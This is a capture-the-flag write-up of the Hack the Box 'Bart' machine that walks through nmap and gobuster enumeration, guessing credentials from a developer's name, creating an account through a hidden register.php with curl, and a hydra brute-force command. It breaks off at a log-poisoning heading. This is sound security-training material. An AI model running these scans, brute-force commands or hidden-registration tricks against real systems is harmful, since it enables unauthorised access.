Skip to content

Latest commit

 

History

History
125 lines (97 loc) · 5.1 KB

bart.md

File metadata and controls

125 lines (97 loc) · 5.1 KB
Raw

Hack the Box - Bart

Machine IP: 10.10.10.81 - Windows
Difficulty: Medium
Category: OSCP Preparation

NMAP

▶ nmap -Pn -sS -p- 10.10.10.81 -T4 --min-rate 1000 -oN bart-ports.nmap

Nmap scan report for 10.10.10.81
Host is up (0.19s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
▶ nmap -sC -sV -p 80 10.10.10.81 -oN bart-services.nmap

Nmap scan report for 10.10.10.81
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

HTTP 80

image image

Source

image

 - Harvey Potter
 - Developer@BART
 - h.potter@bart.htb

Content Discovery

  • Directory brute-force on http://10.10.10.81. Tactical brute-forcing since everything returns a 200 OK status code.
▶ gobuster dir --url http://10.10.10.81 --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --threads 25

image

  • http://10.10.10.81/forum/ image

  • http://10.10.10.81/monitor/ image

User Credentials

  • Valid username harvey. image
  • Valid password potter. image
  • Login image
  • Servers image

Internal Domain

image

Content Discovery

▶ gobuster dir --url http://internal-01.bart.htb --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --threads 25

image

▶ gobuster dir --url http://internal-01.bart.htb/log --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --extensions php --threads 25

image image

▶ gobuster dir --url http://internal-01.bart.htb/simple_chat --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --status-codes 204,301,302,307 --status-codes-blacklist "" --extensions php --threads 25

image

The source code for the chat server is on github: https://github.com/magkopian/php-ajax-simple-chat. Looking at the code, it looks like the version running here removed the register_form.php page, and the link to it from the login_form.php page.

Create User Account

  • Using curl create an account and get access to the site.
▶ curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=hardyboy&passwd=password"

image image

  • Logged in using the created username and password. (hardyboy:password)

Brute-Force Credentials (Optional)

  • Brute-force password for user Harvey.
hydra -l harvey -P /usr/share/wordlists/metasploit/common_roots.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&^passwd=^PASS^&submit=Login:Password"

Log Poisoning

  • Vulnerable Code image